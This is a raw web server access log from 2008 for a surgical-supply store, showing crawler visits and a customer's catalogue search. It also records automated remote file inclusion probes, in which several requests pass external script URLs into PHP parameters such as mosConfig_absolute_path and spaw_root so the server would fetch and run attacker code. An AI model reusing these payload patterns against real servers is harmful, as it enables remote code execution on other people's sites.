66.249.67.114 - - [06/Sep/2008:01:27:15 -0400] "GET /images/items/9600030_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
81.169.162.47 - - [06/Sep/2008:01:27:23 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.162.47 - - [06/Sep/2008:01:27:29 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.haircs.com/bbs/skin/zero_read/test.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
64.246.42.3 - - [06/Sep/2008:01:29:17 -0400] "GET /logs/error_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:01:29:18 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:01:29:22 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.64"
64.246.42.3 - - [06/Sep/2008:01:29:30 -0400] "GET /logs/access_log.Q108082300//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.correiios.com/idddd.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.64"
74.6.17.183 - - [06/Sep/2008:01:29:06 -0400] "GET /logs/access_log.Q107111000 HTTP/1.0" 200 1195353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
24.121.100.169 - - [06/Sep/2008:01:30:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:53 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN HTTP/1.1" 200 49391 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:56 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:56 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:56 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:56 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:56 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:56 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:57 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:58 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:30:59 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.221.210.103 - - [06/Sep/2008:01:31:31 -0400] "GET /logs/access_log.Q108082400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:31:31 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:31:31 -0400] "GET /logs/access_log.Q108082400//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:31:31 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:31:31 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.221.210.103 - - [06/Sep/2008:01:31:31 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.piratamix.net63.net/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Sep/2008:01:31:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.121.100.169 - - [06/Sep/2008:01:31:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L5F52EE2F04159800744905G+M37+ENG HTTP/1.1" 200 75312 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:47 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52EE2F04159800744905G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:47 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52EE2F04159800744905G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:48 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52EE2F04159800744905G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:50 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L5F52EE2F04159800744905G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:51 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:53 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:31:53 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.6.17.183 - - [06/Sep/2008:01:33:26 -0400] "GET /logs/error_log.Q108041700 HTTP/1.0" 200 265907 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
121.101.159.29 - - [06/Sep/2008:01:33:45 -0400] "GET //?_zb_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
121.101.159.29 - - [06/Sep/2008:01:33:45 -0400] "GET /logs/error_log.Q108051300//?_zb_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
121.101.159.29 - - [06/Sep/2008:01:33:45 -0400] "GET /logs//?_zb_path=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 64537 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
74.6.17.183 - - [06/Sep/2008:01:35:09 -0400] "GET /images/_notes/circle_CD_video.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Sep/2008:01:36:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
163.19.117.1 - - [06/Sep/2008:01:37:40 -0400] "GET ///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
163.19.117.1 - - [06/Sep/2008:01:37:40 -0400] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
163.19.117.1 - - [06/Sep/2008:01:37:40 -0400] "GET /logs/access_log.Q108081400///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
24.121.100.169 - - [06/Sep/2008:01:38:30 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN HTTP/1.1" 200 49391 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:33 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
163.19.117.1 - - [06/Sep/2008:01:38:33 -0400] "GET ///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
163.19.117.1 - - [06/Sep/2008:01:38:33 -0400] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
163.19.117.1 - - [06/Sep/2008:01:38:33 -0400] "GET /logs/access_log.Q108081400///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
24.121.100.169 - - [06/Sep/2008:01:38:33 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:33 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
24.121.100.169 - - [06/Sep/2008:01:38:34 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):IBUPROFEN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
